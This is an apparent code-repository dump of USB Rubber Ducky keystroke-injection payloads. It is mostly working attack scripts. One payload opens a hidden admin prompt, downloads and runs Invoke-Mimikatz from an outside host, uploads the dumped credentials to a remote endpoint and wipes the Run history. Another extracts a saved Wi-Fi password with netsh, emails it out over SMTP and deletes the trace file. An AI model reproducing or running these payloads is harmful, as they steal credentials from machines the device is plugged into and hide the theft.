├── AndroidPinBruteForce └── inject.bin ├── InvokeMimikatz └── invokeMimikatz.txt ├── README.md └── obtainWifiPassword ├── ducky_script.txt └── inject.bin /AndroidPinBruteForce/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cclayelijah/DuckyScripts/765d5b703b04a1c8c3b959f29f76f7de19af8f87/AndroidPinBruteForce/inject.bin -------------------------------------------------------------------------------- /InvokeMimikatz/invokeMimikatz.txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke mimikatz and send creds to remote server 2 | REM Author: Elijah Cannon Props: Hak5Darren, Mubix, Clymb3r, Gentilkiwi 3 | DELAY 1500 4 | REM Open an admin command prompt 5 | GUI r 6 | DELAY 500 7 | STRING powershell Start-Process cmd -Verb runAs 8 | ENTER 9 | DELAY 2000 10 | ALT y 11 | DELAY 1000 12 | REM Obfuscate the command prompt 13 | STRING mode con:cols=18 lines=1 14 | ENTER 15 | STRING color FE 16 | ENTER 17 | REM Download and execute Invoke Mimikatz then upload the results 18 | STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" 19 | ENTER 20 | DELAY 15000 21 | REM Clear the Run history and exit 22 | STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 23 | ENTER 24 | STRING exit 25 | ENTER -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MyDuckyScripts 2 | Contains some of the scripts I have made that runs on the USB Rubber Ducky from hak5. 3 | -------------------------------------------------------------------------------- /obtainWifiPassword/ducky_script.txt: -------------------------------------------------------------------------------- 1 | REM AUTHOR: ELIJAH CANNON 2 | REM REPLACE: 'NAME' with SSID, 'from' with your email you're sending from, 'password' with your email password, and 3 | REM 'to' with email you are sending to. 4 | REM DETAILS: Opens cmd(Admin), obtains wifi password, and saves it to a txt file. 5 | REM Opens Powershell, and sends file through SMPT(email). Exits Powershell. 6 | REM Deletes txt file in cmd. Exits cmd. 7 | DELAY 2500 8 | GUI x 9 | DELAY 100 10 | STRING a 11 | DELAY 500 12 | LEFTARROW 13 | DELAY 300 14 | ENTER 15 | DELAY 500 16 | REM ---------------------------Replace 'NAME' with SSID(Name of Wi-fi) 17 | STRING netsh wlan show profile NAME key=clear | findstr Key > C:\wifiPassword.txt 18 | DELAY 100 19 | ENTER 20 | DELAY 500 21 | REM ----------Send through Email 22 | GUI r 23 | DELAY 100 24 | STRING powershell 25 | DELAY 100 26 | ENTER 27 | DELAY 1000 28 | STRING $SMTPServer = 'smtp.gmail.com' 29 | ENTER 30 | STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 31 | ENTER 32 | STRING $SMTPInfo.EnableSsl = $true 33 | ENTER 34 | STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('from@gmail.com', 'password'); 35 | ENTER 36 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 37 | ENTER 38 | STRING $ReportEmail.From = 'from@gmail.com' 39 | ENTER 40 | STRING $ReportEmail.To.Add('to@gmail.com') 41 | ENTER 42 | STRING $ReportEmail.Subject = 'Wi-fi Password' 43 | ENTER 44 | STRING $ReportEmail.Body = 'Attached is a file containing the wifi password' 45 | ENTER 46 | STRING $ReportEmail.Attachments.Add('c:\wifiPassword.txt') 47 | ENTER 48 | STRING $SMTPInfo.Send($ReportEmail) 49 | ENTER 50 | DELAY 3000 51 | STRING exit 52 | DELAY 100 53 | ENTER 54 | DELAY 500 55 | STRING cd .. 56 | DELAY 100 57 | ENTER 58 | DELAY 500 59 | STRING cd .. 60 | DELAY 100 61 | ENTER 62 | DELAY 500 63 | STRING del wifiPassword.txt 64 | DELAY 100 65 | ENTER 66 | DELAY 500 67 | DELAY 1000 68 | STRING exit 69 | DELAY 100 70 | ENTER 71 | -------------------------------------------------------------------------------- /obtainWifiPassword/inject.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cclayelijah/DuckyScripts/765d5b703b04a1c8c3b959f29f76f7de19af8f87/obtainWifiPassword/inject.bin --------------------------------------------------------------------------------